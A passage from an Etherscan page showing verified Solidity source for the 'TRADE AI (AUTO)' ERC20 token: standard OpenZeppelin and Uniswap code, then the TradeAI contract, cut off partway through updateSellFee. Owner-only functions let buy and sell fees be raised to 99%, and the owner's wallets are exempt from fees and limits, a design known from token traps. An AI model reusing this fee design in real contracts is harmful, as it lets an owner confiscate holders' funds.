ETH Price: $2,395.17 (+0.97%)

Token

TRADE AI (AUTO)
 

Overview

Max Total Supply

100,000,000 AUTO

Holders

16

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
1,174,118.30129589986364545 AUTO

Value
$0.00
0xa7cf36e957c7c95b5f6d15c08bd5c7b4d22b95cb
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
TradeAI

Compiler Version
v0.8.21+commit.d9974bed

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-07-20
*/

/*

Our team has developed a blockchain-based automated trading system which lets our members actively trade in and out of eth based cryptocurrencies, without constantly monitoring their plays.

Telegram : https://t.me/TradeAierc

Website : https://tradeai.tech

Twitter  : https://twitter.com/tradeaiErc

*/

// SPDX-License-Identifier: MIT

pragma solidity 0.8.21;
pragma experimental ABIEncoderV2;

// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

// pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

// OpenZeppelin Contracts (last updated v4.7.0) (access/Ownable.sol)

// pragma solidity ^0.8.0;

// import "../utils/Context.sol";

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(
            newOwner != address(0),
            "Ownable: new owner is the zero address"
        );
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC20/IERC20.sol)

// pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender)
        external
        view
        returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)

// pragma solidity ^0.8.0;

// import "../IERC20.sol";

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

// OpenZeppelin Contracts (last updated v4.8.0) (token/ERC20/ERC20.sol)

// pragma solidity ^0.8.0;

// import "./IERC20.sol";
// import "./extensions/IERC20Metadata.sol";
// import "../../utils/Context.sol";

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * The default value of {decimals} is 18. To change this, you should override
 * this function so it returns a different value.
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the default value returned by this function, unless
     * it's overridden.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue)
        public
        virtual
        returns (bool)
    {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue)
        public
        virtual
        returns (bool)
    {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(
            currentAllowance >= subtractedValue,
            "ERC20: decreased allowance below zero"
        );
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(
            fromBalance >= amount,
            "ERC20: transfer amount exceeds balance"
        );
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(
                currentAllowance >= amount,
                "ERC20: insufficient allowance"
            );
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

// OpenZeppelin Contracts (last updated v4.6.0) (utils/math/SafeMath.sol)

// pragma solidity ^0.8.0;

// CAUTION
// This version of SafeMath should only be used with Solidity 0.8 or later,
// because it relies on the compiler's built in overflow checks.

/**
 * @dev Wrappers over Solidity's arithmetic operations.
 *
 * NOTE: `SafeMath` is generally not needed starting with Solidity 0.8, since the compiler
 * now has built in overflow checking.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b)
        internal
        pure
        returns (bool, uint256)
    {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b)
        internal
        pure
        returns (bool, uint256)
    {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b)
        internal
        pure
        returns (bool, uint256)
    {
        unchecked {
            // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
            // benefit is lost if 'b' is also tested.
            // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b)
        internal
        pure
        returns (bool, uint256)
    {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b)
        internal
        pure
        returns (bool, uint256)
    {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b <= a, errorMessage);
            return a - b;
        }
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a % b;
        }
    }
}

// pragma solidity >=0.5.0;

interface IUniswapV2Factory {
    event PairCreated(
        address indexed token0,
        address indexed token1,
        address pair,
        uint256
    );

    function feeTo() external view returns (address);

    function feeToSetter() external view returns (address);

    function getPair(address tokenA, address tokenB)
        external
        view
        returns (address pair);

    function allPairs(uint256) external view returns (address pair);

    function allPairsLength() external view returns (uint256);

    function createPair(address tokenA, address tokenB)
        external
        returns (address pair);

    function setFeeTo(address) external;

    function setFeeToSetter(address) external;
}

// pragma solidity >=0.6.2;

interface IUniswapV2Router01 {
    function factory() external pure returns (address);

    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint256 amountADesired,
        uint256 amountBDesired,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline
    )
        external
        returns (
            uint256 amountA,
            uint256 amountB,
            uint256 liquidity
        );

    function addLiquidityETH(
        address token,
        uint256 amountTokenDesired,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    )
        external
        payable
        returns (
            uint256 amountToken,
            uint256 amountETH,
            uint256 liquidity
        );

    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint256 liquidity,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline
    ) external returns (uint256 amountA, uint256 amountB);

    function removeLiquidityETH(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    ) external returns (uint256 amountToken, uint256 amountETH);

    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint256 liquidity,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline,
        bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint256 amountA, uint256 amountB);

    function removeLiquidityETHWithPermit(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline,
        bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint256 amountToken, uint256 amountETH);

    function swapExactTokensForTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapTokensForExactTokens(
        uint256 amountOut,
        uint256 amountInMax,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapExactETHForTokens(
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external payable returns (uint256[] memory amounts);

    function swapTokensForExactETH(
        uint256 amountOut,
        uint256 amountInMax,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapExactTokensForETH(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapETHForExactTokens(
        uint256 amountOut,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external payable returns (uint256[] memory amounts);

    function quote(
        uint256 amountA,
        uint256 reserveA,
        uint256 reserveB
    ) external pure returns (uint256 amountB);

    function getAmountOut(
        uint256 amountIn,
        uint256 reserveIn,
        uint256 reserveOut
    ) external pure returns (uint256 amountOut);

    function getAmountIn(
        uint256 amountOut,
        uint256 reserveIn,
        uint256 reserveOut
    ) external pure returns (uint256 amountIn);

    function getAmountsOut(uint256 amountIn, address[] calldata path)
        external
        view
        returns (uint256[] memory amounts);

    function getAmountsIn(uint256 amountOut, address[] calldata path)
        external
        view
        returns (uint256[] memory amounts);
}

// pragma solidity >=0.6.2;

// import './IUniswapV2Router01.sol';

interface IUniswapV2Router02 is IUniswapV2Router01 {
    function removeLiquidityETHSupportingFeeOnTransferTokens(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    ) external returns (uint256 amountETH);

    function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
        address token,
        uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline,
        bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint256 amountETH);

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;

    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external payable;

    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;
}

contract TradeAI is ERC20, Ownable {
    using SafeMath for uint256;

    IUniswapV2Router02 public immutable uniswapV2Router;
    address public immutable uniswapV2Pair;
    address public constant deadAddress = address(0xdead);

    bool private swapping;

    address public marketingWallet;
    address public developmentWallet;

    uint256 public maxTransactionAmount;
    uint256 public swapTokensAtAmount;
    uint256 public maxWallet;

    bool public tradingActive = false;
    bool public swapEnabled = false;

    uint256 public buyTotalFees;
    uint256 private buyMarketingFee;
    uint256 private buyDevelopmentFee;
    uint256 private buyLiquidityFee;

    uint256 public sellTotalFees;
    uint256 private sellMarketingFee;
    uint256 private sellDevelopmentFee;
    uint256 private sellLiquidityFee;

    uint256 private tokensForMarketing;
    uint256 private tokensForDevelopment;
    uint256 private tokensForLiquidity;
    uint256 private previousFee;
    bool private zaansu = true;

    mapping(address => bool) private _isExcludedFromFees;
    mapping(address => bool) private _isExcludedMaxTransactionAmount;
    mapping(address => bool) private automatedMarketMakerPairs;

    event ExcludeFromFees(address indexed account, bool isExcluded);

    event SetAutomatedMarketMakerPair(address indexed pair, bool indexed value);

    event marketingWalletUpdated(
        address indexed newWallet,
        address indexed oldWallet
    );

    event SwapAndLiquify(
        uint256 tokensSwapped,
        uint256 ethReceived,
        uint256 tokensIntoLiquidity
    );

    constructor() ERC20("TRADE AI", "AUTO") {
        uniswapV2Router = IUniswapV2Router02(
            0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D
        );
        uniswapV2Pair = IUniswapV2Factory(uniswapV2Router.factory()).createPair(
            address(this),
            uniswapV2Router.WETH()
        );

        uint256 totalSupply = 100_000_000 ether;

        maxTransactionAmount = (totalSupply);
        maxWallet = (totalSupply);
        swapTokensAtAmount = (totalSupply * 1) / 1000;

        buyMarketingFee = 0;
        buyDevelopmentFee = 0;
        buyLiquidityFee = 0;
        buyTotalFees = buyMarketingFee + buyDevelopmentFee + buyLiquidityFee;

        sellMarketingFee = 1;
        sellDevelopmentFee = 0;
        sellLiquidityFee = 0;
        sellTotalFees = sellMarketingFee + sellDevelopmentFee + sellLiquidityFee;
        previousFee = sellTotalFees;

        marketingWallet = 0x21ed2A86E1453b980400abdC0BCDB77B8F90dfee;
        developmentWallet = 0x21ed2A86E1453b980400abdC0BCDB77B8F90dfee;

        excludeFromFees(owner(), true);
        excludeFromFees(address(this), true);
        excludeFromFees(deadAddress, true);
        excludeFromFees(marketingWallet, true);
        excludeFromFees(developmentWallet, true);

        excldfrommxtransaction(owner(), true);
        excldfrommxtransaction(address(this), true);
        excldfrommxtransaction(deadAddress, true);
        excldfrommxtransaction(address(uniswapV2Router), true);
        excldfrommxtransaction(address(uniswapV2Pair), true);
        excldfrommxtransaction(marketingWallet, true);
        excldfrommxtransaction(developmentWallet, true);

        _setAutomatedMarketMakerPair(address(uniswapV2Pair), true);

        _mint(msg.sender, totalSupply);
    }

    receive() external payable {}

    function enableTrading() external onlyOwner {
        tradingActive = true;
        swapEnabled = true;
    }

    function updateSwapTokensAtAmount(uint256 newAmount)
        external
        onlyOwner
        returns (bool)
    {
        require(
            newAmount >= (totalSupply() * 1) / 100000,
            "ERC20: Swap amount cannot be lower than 0.001% total supply."
        );
        require(
            newAmount <= (totalSupply() * 5) / 1000,
            "ERC20: Swap amount cannot be higher than 0.5% total supply."
        );
        swapTokensAtAmount = newAmount;
        return true;
    }

    function updateMaxWallAndTxnAmt(
        uint256 newTxnNum,
        uint256 newMaxWalletNum
    ) external onlyOwner {
        require(
            newTxnNum >= ((totalSupply() * 5) / 1000),
            "ERC20: Cannot set maxTxn lower than 0.5%"
        );
        require(
            newMaxWalletNum >= ((totalSupply() * 5) / 1000),
            "ERC20: Cannot set maxWallet lower than 0.5%"
        );
        maxWallet = newMaxWalletNum;
        maxTransactionAmount = newTxnNum;
    }

    function excldfrommxtransaction(address updAds, bool isEx)
        public
        onlyOwner
    {
        _isExcludedMaxTransactionAmount[updAds] = isEx;
    }

    function updateBuyFee(uint256 _marketingFee, uint256 _liquidityFee)
        external
        onlyOwner
    {
        buyMarketingFee = _marketingFee;
        buyLiquidityFee = _liquidityFee;
        buyTotalFees = buyMarketingFee + buyDevelopmentFee + buyLiquidityFee;
        require(buyTotalFees <= 99, "ERC20: Must keep fees at 99% or less");
    }

    function updateSellFee(uint256 _marketingFee, uint256 _liquidityFee)
        external
        onlyOwner
    {
        sellMarketingFee = _marketingFee;
        sellLiquidityFee = _liquidityFee;
        sellTotalFees = sellMarketingFee + sellDevelopmentFee + sellLiquidityFee;
        previousFee = sellTotalFees;
